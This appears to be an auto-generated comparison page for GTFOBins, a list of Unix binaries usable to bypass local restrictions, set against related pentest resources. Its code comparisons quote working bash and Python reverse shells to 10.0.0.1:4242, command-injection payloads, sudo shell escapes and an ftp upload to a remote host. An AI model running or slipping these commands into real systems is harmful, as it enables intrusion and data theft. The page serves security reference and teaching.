GTFOBins.github.io
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems
Top Related Projects
🎯 Command Injection Payload List
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)
SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
This repository contains cutting-edge open-source security tools (OST) for a red teamer and threat hunter.
Quick Overview
GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions in misconfigured systems. It serves as a valuable resource for both security professionals and system administrators to understand potential vulnerabilities and improve system security. The project is maintained as a GitHub repository with a dedicated website for easy access and navigation.
Pros
- Comprehensive collection of Unix binaries and their potential security implications
- Regularly updated with community contributions
- Well-organized and easy to navigate
- Provides practical examples for each binary
Cons
- Could potentially be misused by malicious actors
- Requires careful interpretation and understanding of the context
- May not cover all possible exploitation scenarios
- Some examples might become outdated as systems and software evolve
Getting Started
As GTFOBins is not a code library but rather a reference resource, there's no code to install or run. To use GTFOBins:
- Visit the official website: https://gtfobins.github.io/
- Use the search function to find specific binaries
- Read the provided information and examples for each binary
- Apply the knowledge to improve system security or conduct authorized penetration testing
For contributors:
- Fork the GitHub repository: https://github.com/GTFOBins/GTFOBins.github.io
- Add or modify binary entries following the project's guidelines
- Submit a pull request for review
Remember to use this information responsibly and only on systems you own or have explicit permission to test.
Competitor Comparisons
🎯 Command Injection Payload List
Pros of command-injection-payload-list
- Focused specifically on command injection payloads, providing a comprehensive list for this attack vector
- Includes payloads for various operating systems and scenarios, making it versatile for different environments
- Regularly updated with new payloads and techniques
Cons of command-injection-payload-list
- Less structured and categorized compared to GTFOBins, making it potentially harder to navigate
- Lacks detailed explanations or context for each payload, which may be less helpful for beginners
- Does not provide information on binary exploitation or privilege escalation techniques
Code Comparison
GTFOBins (YAML format):
---
functions:
  shell:
    - code: ash -p
  command:
    - code: ash -c 'command'
  sudo:
    - code: sudo ash -p
command-injection-payload-list (Plain text format):
;netstat -a;
|netstat -a|
`netstat -a`
$(netstat -a)
Both repositories provide valuable resources for security professionals and penetration testers. GTFOBins offers a more structured approach with detailed information on binary exploitation, while command-injection-payload-list focuses specifically on command injection techniques with a wide range of payloads.
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Pros of PayloadsAllTheThings
- Broader scope covering various security topics beyond just binaries
- More extensive and detailed content with examples and explanations
- Regularly updated with contributions from a larger community
Cons of PayloadsAllTheThings
- Less focused, making it harder to find specific information quickly
- May be overwhelming for beginners due to the sheer amount of content
- Not as easily searchable or filterable as GTFOBins
Code Comparison
GTFOBins (YAML format):
---
functions:
  shell:
    - code: ash -p
  file-read:
    - code: ash -c 'echo "$(<file)"'
PayloadsAllTheThings (Markdown format):
## Reverse Shell
### Bash TCP
```bash
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
```
### Python
```bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
Both repositories provide valuable information for security professionals, but they serve different purposes. GTFOBins focuses specifically on Unix binaries that can be exploited, while PayloadsAllTheThings covers a wider range of security topics and payloads.
PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)
Pros of PEASS-ng
- Comprehensive suite of privilege escalation tools for multiple platforms
- Actively maintained with frequent updates and improvements
- Includes both automated scripts and manual techniques for thorough assessments
Cons of PEASS-ng
- Larger codebase and more complex to use compared to GTFOBins
- May require more setup and configuration for specific environments
- Potentially overwhelming for beginners due to its extensive feature set
Code Comparison
PEASS-ng (linpeas.sh):
if [ "$MACPEAS" ]; then
  print_title "MacPEAS - macOS local Privilege Escalation Auditing Script"
else
  print_title "LinPEAS - Linux local Privilege Escalation Auditing Script"
fi
GTFOBins (example from _layouts/bin.html):
{% if include.function %}
<h2 class="function-name" id="{{ include.function | slugify }}">{{include.function}}</h2>
{% endif %}
The code snippets demonstrate the different focus of each project. PEASS-ng is a comprehensive script for privilege escalation auditing, while GTFOBins provides a curated list of binaries that can be exploited for privilege escalation.
SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
Pros of SecLists
- Broader scope: Covers various security testing aspects beyond just Unix binaries
- Larger collection: Contains numerous wordlists, payloads, and resources for different security scenarios
- Regular updates: Frequently maintained with contributions from the community
Cons of SecLists
- Less focused: Not specialized in a single area like GTFOBins
- Potentially overwhelming: Large repository size may make it harder to find specific information quickly
- Requires more context: Users need to understand how to apply the lists in different scenarios
Code Comparison
While a direct code comparison isn't applicable due to the different nature of these repositories, we can compare their structure:
GTFOBins:
---
functions:
  shell:
    - code: COMMAND
  file-read:
    - code: COMMAND
SecLists:
/Passwords
/Usernames
/Fuzzing
/Discovery
GTFOBins focuses on YAML files describing binary exploits, while SecLists organizes various text files into categorized directories.
This repository contains cutting-edge open-source security tools (OST) for a red teamer and threat hunter.
Pros of Red-Teaming-Toolkit
- Broader scope covering various red teaming techniques and tools
- Organized by categories, making it easier to find specific types of tools
- Includes links to external resources and tutorials
Cons of Red-Teaming-Toolkit
- Less frequently updated compared to GTFOBins
- Not as focused on specific binary exploitation techniques
- Lacks detailed explanations for each tool or technique
Code Comparison
GTFOBins (YAML format):
---
functions:
  shell:
    - code: COMMAND='id' ftp -e '! $COMMAND'
  file-upload:
    - description: Send local file to a FTP server.
      code: ftp -v -n $RHOST <<EOF
Red-Teaming-Toolkit (Markdown format):
## Reconnaissance
* [AQUATONE](https://github.com/michenriksen/aquatone) - A Tool for Domain Flyovers
* [Nmap](https://github.com/nmap/nmap) - The Network Mapper
GTFOBins focuses on providing specific code snippets for exploiting binaries, while Red-Teaming-Toolkit primarily lists tools and resources without detailed code examples. GTFOBins uses YAML for structured data, whereas Red-Teaming-Toolkit uses Markdown for simple formatting and organization.
README
GTFOBins
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
Find the project at https://gtfobins.github.io